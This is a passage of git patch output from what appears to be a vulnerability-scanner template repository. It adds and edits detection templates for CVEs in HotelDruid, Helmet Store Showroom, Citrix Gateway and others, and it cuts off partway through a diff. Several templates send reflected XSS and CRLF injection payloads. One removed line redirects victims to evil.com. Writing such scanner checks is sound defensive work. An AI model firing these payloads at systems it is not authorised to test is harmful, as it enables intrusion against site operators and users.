-http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee +http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c +http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 +http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f +http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 +http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 +http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce +http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 +http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b +http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 +http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 +http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 +http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6473,7 +6474,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:7c0ef8c37eff55f2d0de620cf778fced488ad17a +templates-checksum.txt:5c777d60a844e4b801bae5a6713f104e3cee85b2 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From b741fabca71f97bdf511a4f57ad9d8cae6d0ca84 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 30 Jun 2023 16:56:36 +0530 Subject: [PATCH 202/609] updated req,matchers --- http/cves/2023/CVE-2023-34537.yaml | 19 ++++++++++++++----- 1 file changed, 14 insertions(+), 5 deletions(-) diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index b8b5d03a4f..aede73ccd1 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -1,7 +1,7 @@ id: CVE-2023-34537 info: - name: Hoteldruid - Cross Site Scripting + name: Hoteldruid 3.0.5 - Cross-Site Scripting author: Harsh severity: medium description: | @@ -21,17 +21,26 @@ info: http: - raw: - | - POST /hoteldruid/creaprezzi.php HTTP/1.1 + POST /inizio.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + vers_hinc=1&nome_utente_phpr={{username}}&password_phpr={{password}} + + - | + POST /creaprezzi.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded anno=2023&id_sessione=&tipotariffa=a19yc%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3emjf9oc2183m&inizioperiodosett1=2023-12-24&fineperiodosett1=2023-12-31&tipo_prezzo=sett&prezzosett=&prezzosettp=&prezzoperiodo1=&prezzoperiodo1p=&prezzoperiodo2=&prezzoperiodo2p=&prezzoperiodo3=&prezzoperiodo3p=&prezzoperiodo4=&prezzoperiodo4p=&prezzoperiodo5=&prezzoperiodo5p=&prezzoperiodo6=&prezzoperiodo6p=&prezzoperiodo7=&prezzoperiodo7p=&inserisci_settimanalmente=1 + skip-variables-check: true redirects: true matchers: - type: dsl dsl: - - 'status_code == 200' - - 'contains(body, "")' - - 'contains(body, "HotelDruid")' + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "")' + - 'contains(body_2, "HotelDruid")' condition: and From 64fcb1cf114bd08ab724b30373a450938db558f8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 30 Jun 2023 17:06:19 +0530 Subject: [PATCH 203/609] updated payload,matchers --- http/cves/2023/CVE-2023-0527.yaml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/http/cves/2023/CVE-2023-0527.yaml b/http/cves/2023/CVE-2023-0527.yaml index 4e76746784..2b3ee059c4 100644 --- a/http/cves/2023/CVE-2023-0527.yaml +++ b/http/cves/2023/CVE-2023-0527.yaml @@ -1,7 +1,7 @@ id: CVE-2023-0527 info: - name: Online Security Guards Hiring System - Reflected XSS + name: Online Security Guards Hiring System - Cross-Site Scripting author: Harsh severity: medium description: | @@ -17,22 +17,22 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2023,osghs,xss,unauthenticated,reflected + tags: cve,cve2023,osghs,xss + http: - raw: - | - POST /osghs/search-request.php HTTP/1.1 + POST /search-request.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - searchdata=%3Cimg+src%3D%22%23%22+onerror%3D%22location.href%3D%27http%3A%2F%2Fevil.com%27%3B%22%3E&search= + searchdata=&search= - cookie-reuse: true - redirects: true matchers: - type: dsl dsl: - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "")' - 'contains(body, "Online Security Gauard Hiring System |Search Request")' - - 'contains(body, "evil.com")' condition: and From 7eac52e666fd20f59fc55beaad77e80838ac9033 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 30 Jun 2023 17:51:12 +0530 Subject: [PATCH 204/609] lint fix --- http/cves/2022/CVE-2022-46071.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/http/cves/2022/CVE-2022-46071.yaml b/http/cves/2022/CVE-2022-46071.yaml index 8ab54853ad..a7ca50ca6d 100644 --- a/http/cves/2022/CVE-2022-46071.yaml +++ b/http/cves/2022/CVE-2022-46071.yaml @@ -1,7 +1,7 @@ id: CVE-2022-46071 info: - name: SQL Injection - Login Page + name: Helmet Store Showroom v1.0 - SQL Injection author: Harsh severity: critical description: | @@ -17,6 +17,7 @@ info: metadata: verified: true tags: cve,cve2022,sql,admin_bypass + http: - raw: - | @@ -29,7 +30,7 @@ http: - | GET /hss/admin/ HTTP/1.1 Host: {{Hostname}} - + cookie-reuse: true matchers: - type: dsl From 736f62487c1acd41f83e513b913072e7350b514f Mon Sep 17 00:00:00 2001 From: Harsh Yadav <40105975+harsh2403@users.noreply.github.com> Date: Fri, 30 Jun 2023 18:18:15 +0530 Subject: [PATCH 205/609] Create CVE-2022-46073.yaml --- http/cves/2022/CVE-2022-46073.yaml | 32 ++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/cves/2022/CVE-2022-46073.yaml diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml new file mode 100644 index 0000000000..a04ec7c33a --- /dev/null +++ b/http/cves/2022/CVE-2022-46073.yaml @@ -0,0 +1,32 @@ +id: CVE-2022-46073 + +info: + name: Reflected Cross Site Scripting + author: Harsh + severity: medium + description: | + Helmet Store Showroom 1.0 is vulnerable to Cross Site Scripting (XSS). + reference: + - https://yuyudhn.github.io/CVE-2022-46073/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-46073 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-46073 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,xss +http: + - raw: + - | + GET /hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "Helmet Store Showroom")' + - 'contains(body, ">")' + condition: and From a4c6413c35f63c1143d3e65bc16a9a373ad7a485 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 30 Jun 2023 23:27:25 +0530 Subject: [PATCH 206/609] added project check for some workflows! --- .github/workflows/cache-purge.yml | 1 + .github/workflows/template-checksum.yml | 1 + .github/workflows/template-db-indexer.yml | 1 + 3 files changed, 3 insertions(+) diff --git a/.github/workflows/cache-purge.yml b/.github/workflows/cache-purge.yml index f77e1d44a5..00723f4aac 100644 --- a/.github/workflows/cache-purge.yml +++ b/.github/workflows/cache-purge.yml @@ -9,6 +9,7 @@ on: jobs: deploy: runs-on: ubuntu-latest + if: github.repository == 'projectdiscovery/nuclei-templates' steps: # Wait for 5 minutes - name: Wait for 2 minutes diff --git a/.github/workflows/template-checksum.yml b/.github/workflows/template-checksum.yml index cbfe19192b..915713f526 100644 --- a/.github/workflows/template-checksum.yml +++ b/.github/workflows/template-checksum.yml @@ -11,6 +11,7 @@ on: jobs: checksum: runs-on: ubuntu-latest + if: github.repository == 'projectdiscovery/nuclei-templates' steps: - uses: actions/checkout@v3 with: diff --git a/.github/workflows/template-db-indexer.yml b/.github/workflows/template-db-indexer.yml index 9959214432..f933d5078c 100644 --- a/.github/workflows/template-db-indexer.yml +++ b/.github/workflows/template-db-indexer.yml @@ -11,6 +11,7 @@ on: jobs: index: runs-on: ubuntu-latest + if: github.repository == 'projectdiscovery/nuclei-templates' steps: - name: Set up Go uses: actions/setup-go@v4 From 64a18eaa16a438075e03a2c4ebc4ed039f4eaa9b Mon Sep 17 00:00:00 2001 From: johnk3r Date: Fri, 30 Jun 2023 14:58:56 -0300 Subject: [PATCH 207/609] Create CVE-2023-24488.yaml (#7581) * Create CVE-2023-24488.yaml * Update CVE-2023-24488.yaml * Update CVE-2023-24488.yaml * added metadata * fix matcher * added fixed and strict matchers + classification --------- Co-authored-by: Dhiyaneshwaran Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> --- http/cves/2023/CVE-2023-24488.yaml | 35 ++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/cves/2023/CVE-2023-24488.yaml diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml new file mode 100644 index 0000000000..dad3fd6812 --- /dev/null +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -0,0 +1,35 @@ +id: CVE-2023-24488 + +info: + name: Citrix Gateway and Citrix ADC - Cross-Site Scripting + author: johnk3r + severity: medium + description: | + Citrix ADC and Citrix Gateway versions before 13.1 and 13.1-45.61, 13.0 and 13.0-90.11, 12.1 and 12.1-65.35 contain a cross-site scripting vulnerability due to improper input validation. + reference: + - https://support.citrix.com/article/CTX477714/citrix-adc-and-citrix-gateway-security-bulletin-for-cve202324487-cve202324488 + - https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-24488 + - https://twitter.com/infosec_au/status/1674786106381070342 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-24488 + cwe-id: CWE-79 + metadata: + max-request: 1 + shodan-query: title:"Citrix Gateway" + tags: cve,cve2023,citrix,xss,adc + +http: + - method: GET + path: + - '{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a' + + matchers: + - type: dsl + dsl: + - 'contains(body, "")' + - 'contains(to_lower(body), "content-type: text/html")' + - 'status_code == 302' + condition: and \ No newline at end of file From 6abb12b10a84fb5228ac5e1c80fed652f2207253 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 30 Jun 2023 17:59:16 +0000 Subject: [PATCH 208/609] Auto Generated New Template Addition List [Fri Jun 30 17:59:16 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 86c9c90ca8..d642f0a641 100644 --- a/.new-additions +++ b/.new-additions @@ -14,6 +14,7 @@ http/cves/2023/CVE-2023-0563.yaml http/cves/2023/CVE-2023-1454.yaml http/cves/2023/CVE-2023-20888.yaml http/cves/2023/CVE-2023-20889.yaml +http/cves/2023/CVE-2023-24488.yaml http/cves/2023/CVE-2023-25346.yaml http/cves/2023/CVE-2023-26842.yaml http/cves/2023/CVE-2023-26843.yaml From 114efc53f53891e6943d5ef9c15f76156c471618 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 30 Jun 2023 17:59:26 +0000 Subject: [PATCH 209/609] Auto Generated Templates Checksum [Fri Jun 30 17:59:26 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 907bfae947..9d74ab38d5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2249,6 +2249,7 @@ http/cves/2023/CVE-2023-24243.yaml:f7140f03e945019aeacaecc8b17522e54b76c22b http/cves/2023/CVE-2023-24278.yaml:73df5ba94e0c9c9d4bb93e84e0aff81a08e9e02e http/cves/2023/CVE-2023-24322.yaml:d5974d1b331522108a5c6887310883dc37e2dc84 http/cves/2023/CVE-2023-24367.yaml:bbd47946b2f67527112614488332589093ee79f9 +http/cves/2023/CVE-2023-24488.yaml:c8c3bd7790562f2d541e123230ec03da08e34f97 http/cves/2023/CVE-2023-24657.yaml:a74e32282a92bcd670fd99eb1f795ebbeb3cfd1f http/cves/2023/CVE-2023-24733.yaml:371ec9554e1239ff6f5278113e9938f331d238b7 http/cves/2023/CVE-2023-24735.yaml:5531cc3389cc427a38868696e7a22919348cdba9 @@ -6474,7 +6475,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:5c777d60a844e4b801bae5a6713f104e3cee85b2 +templates-checksum.txt:5b27f85a0d5442ffc25fd8ad5519e2efc58e5eaf wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 4ae90399de8ca0c8184e5d4cbde61d5d8400c229 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 30 Jun 2023 23:57:26 +0530 Subject: [PATCH 210/609] removed request for diff ports nuclei expect port scanned input for http templates --- http/cves/2022/CVE-2022-35405.yaml | 19 ------------------- 1 file changed, 19 deletions(-) diff --git a/http/cves/2022/CVE-2022-35405.yaml b/http/cves/2022/CVE-2022-35405.yaml index b399e8b13f..2261d3053d 100644 --- a/http/cves/2022/CVE-2022-35405.yaml +++ b/http/cves/2022/CVE-2022-35405.yaml @@ -29,25 +29,6 @@ http: body: | {{randstr}}big0us - - method: POST - path: - - "{{RootURL}}:8282/xmlrpc" - body: | - {{randstr}}big0us - - - method: POST - path: - - "{{RootURL}}:9292/xmlrpc" - body: | - {{randstr}}big0us - - - method: POST - path: - - "{{RootURL}}:7272/xmlrpc" - body: | - {{randstr}}big0us - - stop-at-first-match: true matchers-condition: and matchers: - type: word From 77f9531abbe658c4d3b0552ebbef13d3f13709ab Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 30 Jun 2023 15:12:56 -0700 Subject: [PATCH 211/609] revert cd3bd124f97b893de42250c63aa0f07b61559c15 --- http/exposed-panels/adiscon-loganalyzer.yaml | 2 +- http/exposed-panels/ambari-exposure.yaml | 2 +- http/exposed-panels/avtech-dvr-exposure.yaml | 2 +- http/exposed-panels/dplus-dashboard.yaml | 2 +- http/exposed-panels/gnu-mailman.yaml | 2 +- http/exposed-panels/hydra-dashboard.yaml | 2 +- http/exposed-panels/hypertest-dashboard.yaml | 2 +- http/exposed-panels/jupyter-notebook.yaml | 2 +- http/exposed-panels/kubernetes-web-view.yaml | 2 +- http/exposed-panels/kubeview-dashboard.yaml | 2 +- http/exposed-panels/linkerd-panel.yaml | 2 +- http/exposed-panels/logitech-harmony-portal.yaml | 2 +- http/exposed-panels/magento-downloader-panel.yaml | 2 +- http/exposed-panels/microfocus-admin-server.yaml | 2 +- http/exposed-panels/monitorix-exposure.yaml | 2 +- http/exposed-panels/neo4j-browser.yaml | 2 +- http/exposed-panels/nginx-ui-dashboard.yaml | 2 +- http/exposed-panels/nsq-admin-panel.yaml | 2 +- http/exposed-panels/parse-dashboard.yaml | 2 +- http/exposed-panels/puppetboard-panel.yaml | 2 +- http/exposed-panels/smartping-dashboard.yaml | 2 +- http/exposed-panels/tekton-dashboard.yaml | 2 +- http/exposed-panels/temenos-t24-login.yaml | 2 +- http/exposed-panels/wiren-board-webui.yaml | 2 +- http/exposed-panels/yarn-manager-exposure.yaml | 2 +- 25 files changed, 25 insertions(+), 25 deletions(-) diff --git a/http/exposed-panels/adiscon-loganalyzer.yaml b/http/exposed-panels/adiscon-loganalyzer.yaml index 2b5e18d281..d0fcf770ca 100644 --- a/http/exposed-panels/adiscon-loganalyzer.yaml +++ b/http/exposed-panels/adiscon-loganalyzer.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 reference: - https://loganalyzer.adiscon.com/ - tags: adiscon,loganalyzer,syslog,panel + tags: adiscon,loganalyzer,syslog,exposure,panel metadata: max-request: 1 diff --git a/http/exposed-panels/ambari-exposure.yaml b/http/exposed-panels/ambari-exposure.yaml index 62eaa8f8f5..e116a2bcf4 100644 --- a/http/exposed-panels/ambari-exposure.yaml +++ b/http/exposed-panels/ambari-exposure.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-668 - tags: panel,apache,ambari + tags: panel,apache,ambari,exposure metadata: max-request: 1 diff --git a/http/exposed-panels/avtech-dvr-exposure.yaml b/http/exposed-panels/avtech-dvr-exposure.yaml index 939d01c109..7518cbd5aa 100644 --- a/http/exposed-panels/avtech-dvr-exposure.yaml +++ b/http/exposed-panels/avtech-dvr-exposure.yaml @@ -7,7 +7,7 @@ info: description: AVTECH AVC798HA DVR is susceptible to information exposure. CGI scripts in the /cgi-bin/nobody directory can be accessed without authentication. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. reference: - http://www.avtech.com.tw/ - tags: dvr,avtech,panel + tags: dvr,exposure,avtech,panel metadata: max-request: 1 diff --git a/http/exposed-panels/dplus-dashboard.yaml b/http/exposed-panels/dplus-dashboard.yaml index 0d265f32e7..1d9fc1689e 100644 --- a/http/exposed-panels/dplus-dashboard.yaml +++ b/http/exposed-panels/dplus-dashboard.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"DPLUS Dashboard" - tags: panel,dplus + tags: panel,dplus,exposure http: - method: GET diff --git a/http/exposed-panels/gnu-mailman.yaml b/http/exposed-panels/gnu-mailman.yaml index 62576e0c26..ade4f1a629 100644 --- a/http/exposed-panels/gnu-mailman.yaml +++ b/http/exposed-panels/gnu-mailman.yaml @@ -14,7 +14,7 @@ info: max-request: 2 verified: true shodan-query: title:"Mailing Lists" - tags: mailman,panel + tags: exposure,mailman,panel http: - method: GET diff --git a/http/exposed-panels/hydra-dashboard.yaml b/http/exposed-panels/hydra-dashboard.yaml index 667babdda3..3a9bdf8fdc 100644 --- a/http/exposed-panels/hydra-dashboard.yaml +++ b/http/exposed-panels/hydra-dashboard.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Hydra Router Dashboard" - tags: panel,hydra + tags: panel,exposure,hydra http: - method: GET diff --git a/http/exposed-panels/hypertest-dashboard.yaml b/http/exposed-panels/hypertest-dashboard.yaml index 23fc103fe5..4bbf382e80 100644 --- a/http/exposed-panels/hypertest-dashboard.yaml +++ b/http/exposed-panels/hypertest-dashboard.yaml @@ -16,7 +16,7 @@ info: max-request: 1 verified: true shodan-query: title:"HyperTest" - tags: panel,hypertest + tags: panel,exposure,hypertest http: - method: GET diff --git a/http/exposed-panels/jupyter-notebook.yaml b/http/exposed-panels/jupyter-notebook.yaml index 73a81b3b9f..99d7adb257 100644 --- a/http/exposed-panels/jupyter-notebook.yaml +++ b/http/exposed-panels/jupyter-notebook.yaml @@ -15,7 +15,7 @@ info: metadata: max-request: 4 shodan-query: http.html:"JupyterHub" - tags: edb,panel,jupyter,notebook + tags: edb,panel,jupyter,notebook,exposure http: - method: GET diff --git a/http/exposed-panels/kubernetes-web-view.yaml b/http/exposed-panels/kubernetes-web-view.yaml index 0eae7bd4a1..9bcea113ab 100644 --- a/http/exposed-panels/kubernetes-web-view.yaml +++ b/http/exposed-panels/kubernetes-web-view.yaml @@ -13,7 +13,7 @@ info: max-request: 2 verified: true shodan-query: title:"Kubernetes Web View" - tags: panel,kubernetes,k8s + tags: panel,misconfig,kubernetes,k8s http: - method: GET diff --git a/http/exposed-panels/kubeview-dashboard.yaml b/http/exposed-panels/kubeview-dashboard.yaml index 455930745a..8b840e2a24 100644 --- a/http/exposed-panels/kubeview-dashboard.yaml +++ b/http/exposed-panels/kubeview-dashboard.yaml @@ -14,7 +14,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:-379154636 - tags: k8s,kubernetes,kubeview,dashboard,panel + tags: exposure,k8s,kubernetes,kubeview,dashboard,panel http: - method: GET diff --git a/http/exposed-panels/linkerd-panel.yaml b/http/exposed-panels/linkerd-panel.yaml index 00dce4c0a5..7b78afdd49 100644 --- a/http/exposed-panels/linkerd-panel.yaml +++ b/http/exposed-panels/linkerd-panel.yaml @@ -14,7 +14,7 @@ info: max-request: 1 verified: true shodan-query: html:"data-controller-namespace" - tags: panel,linkerd + tags: panel,misconfig,linkerd,exposure http: - method: GET diff --git a/http/exposed-panels/logitech-harmony-portal.yaml b/http/exposed-panels/logitech-harmony-portal.yaml index 946c229ff4..9c9a99f4e7 100644 --- a/http/exposed-panels/logitech-harmony-portal.yaml +++ b/http/exposed-panels/logitech-harmony-portal.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Logitech Harmony Pro Installer" - tags: panel,logiharmony + tags: panel,logitech,harmony,exposure http: - method: GET diff --git a/http/exposed-panels/magento-downloader-panel.yaml b/http/exposed-panels/magento-downloader-panel.yaml index 570fc98ead..c464dedeb2 100644 --- a/http/exposed-panels/magento-downloader-panel.yaml +++ b/http/exposed-panels/magento-downloader-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.component:"Magento" - tags: magento,panel + tags: magento,exposure,panel http: - method: GET diff --git a/http/exposed-panels/microfocus-admin-server.yaml b/http/exposed-panels/microfocus-admin-server.yaml index 995440f6e4..a8fd3a1c33 100644 --- a/http/exposed-panels/microfocus-admin-server.yaml +++ b/http/exposed-panels/microfocus-admin-server.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: "Micro Focus DSD" - tags: panel,microfocus,admin + tags: panel,exposure,microfocus,admin http: - method: GET diff --git a/http/exposed-panels/monitorix-exposure.yaml b/http/exposed-panels/monitorix-exposure.yaml index 8074bb5c1a..0fb8823aa4 100644 --- a/http/exposed-panels/monitorix-exposure.yaml +++ b/http/exposed-panels/monitorix-exposure.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: monitorix,logs,panel + tags: monitorix,exposure,logs,panel metadata: max-request: 1 diff --git a/http/exposed-panels/neo4j-browser.yaml b/http/exposed-panels/neo4j-browser.yaml index e009b0b535..043f021cbc 100644 --- a/http/exposed-panels/neo4j-browser.yaml +++ b/http/exposed-panels/neo4j-browser.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Neo4j Browser" - tags: neo4j,unauth,panel + tags: neo4j,exposure,unauth,panel http: - method: GET diff --git a/http/exposed-panels/nginx-ui-dashboard.yaml b/http/exposed-panels/nginx-ui-dashboard.yaml index 25d62862a7..cc34e4f007 100644 --- a/http/exposed-panels/nginx-ui-dashboard.yaml +++ b/http/exposed-panels/nginx-ui-dashboard.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"nginx ui" - tags: panel,nginx + tags: panel,nginx,exposure http: - method: GET diff --git a/http/exposed-panels/nsq-admin-panel.yaml b/http/exposed-panels/nsq-admin-panel.yaml index 01b2e18701..463a1349f5 100644 --- a/http/exposed-panels/nsq-admin-panel.yaml +++ b/http/exposed-panels/nsq-admin-panel.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: title:"nsqadmin" - tags: nsq,admin,panel + tags: nsq,admin,panel,exposure http: - method: GET diff --git a/http/exposed-panels/parse-dashboard.yaml b/http/exposed-panels/parse-dashboard.yaml index 872d39afbd..6f49b3d237 100644 --- a/http/exposed-panels/parse-dashboard.yaml +++ b/http/exposed-panels/parse-dashboard.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Parse Dashboard" - tags: panel,parse + tags: panel,parse,exposure http: - method: GET diff --git a/http/exposed-panels/puppetboard-panel.yaml b/http/exposed-panels/puppetboard-panel.yaml index fc518a947c..3b114c4974 100644 --- a/http/exposed-panels/puppetboard-panel.yaml +++ b/http/exposed-panels/puppetboard-panel.yaml @@ -14,7 +14,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Puppetboard" - tags: panel,puppet + tags: panel,puppet,exposure http: - method: GET diff --git a/http/exposed-panels/smartping-dashboard.yaml b/http/exposed-panels/smartping-dashboard.yaml index 8b0407d776..a21dfd1b3b 100644 --- a/http/exposed-panels/smartping-dashboard.yaml +++ b/http/exposed-panels/smartping-dashboard.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"SmartPing Dashboard" - tags: panel,unauth,smartping + tags: panel,misconfig,unauth,smartping http: - method: GET diff --git a/http/exposed-panels/tekton-dashboard.yaml b/http/exposed-panels/tekton-dashboard.yaml index 2b173c0dc8..de2323dc29 100644 --- a/http/exposed-panels/tekton-dashboard.yaml +++ b/http/exposed-panels/tekton-dashboard.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Tekton" - tags: panel,tekton + tags: panel,tekton,exposure http: - method: GET diff --git a/http/exposed-panels/temenos-t24-login.yaml b/http/exposed-panels/temenos-t24-login.yaml index 